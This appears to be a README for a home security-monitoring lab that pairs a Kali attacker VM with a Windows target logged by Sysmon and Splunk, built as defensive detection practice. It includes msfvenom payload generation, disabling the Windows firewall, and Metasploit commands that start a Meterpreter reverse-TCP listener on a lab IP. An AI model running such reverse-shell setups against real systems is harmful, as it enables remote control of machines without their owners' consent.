This project is a home SOC lab demonstrating:
- Kali Linux as the attacker machine
- Windows VM as the target machine
- Sysmon installed on Windows to log system events
- Splunk (or Splunk Universal Forwarder) to collect and visualize logs
This repository does not include any malware or payload executables
- Simulate Windows event monitoring using Sysmon.
- Generate safe payloads for testing (e.g., Meterpreter in a controlled internal network).
- Capture and visualize logs in Splunk to understand attack behaviors.
- Internal Network in VirtualBox for isolation.
- Kali Linux VM IP:
192.168.20.11 - Windows VM IP:
192.168.20.10 - Subnet mask:
255.255.255.0
- Installed Metasploit Framework for testing payloads.
- Generated safe test payloads with
msfvenomusing LHOST = Kali IP. - Started listener with
msfconsole:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.20.11
set LPORT 8888
exploit
Windows VM
Installed Sysmon with a configuration XML:
sysmon.exe -i sysmonconfig.xml
Disabled firewall temporarily for lab testing.
Verified Sysmon logs in Event Viewer:
Splunk Configuration
Installed Splunk Universal Forwarder on Windows VM.
Configured inputs.conf to collect Sysmon logs:
[WinEventLog://Microsoft-Windows-Sysmon/Operational]
disabled = 0
index = sysmon
sourcetype = XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Restarted Splunk service to begin indexing events.
Verified events appear in Splunk dashboards.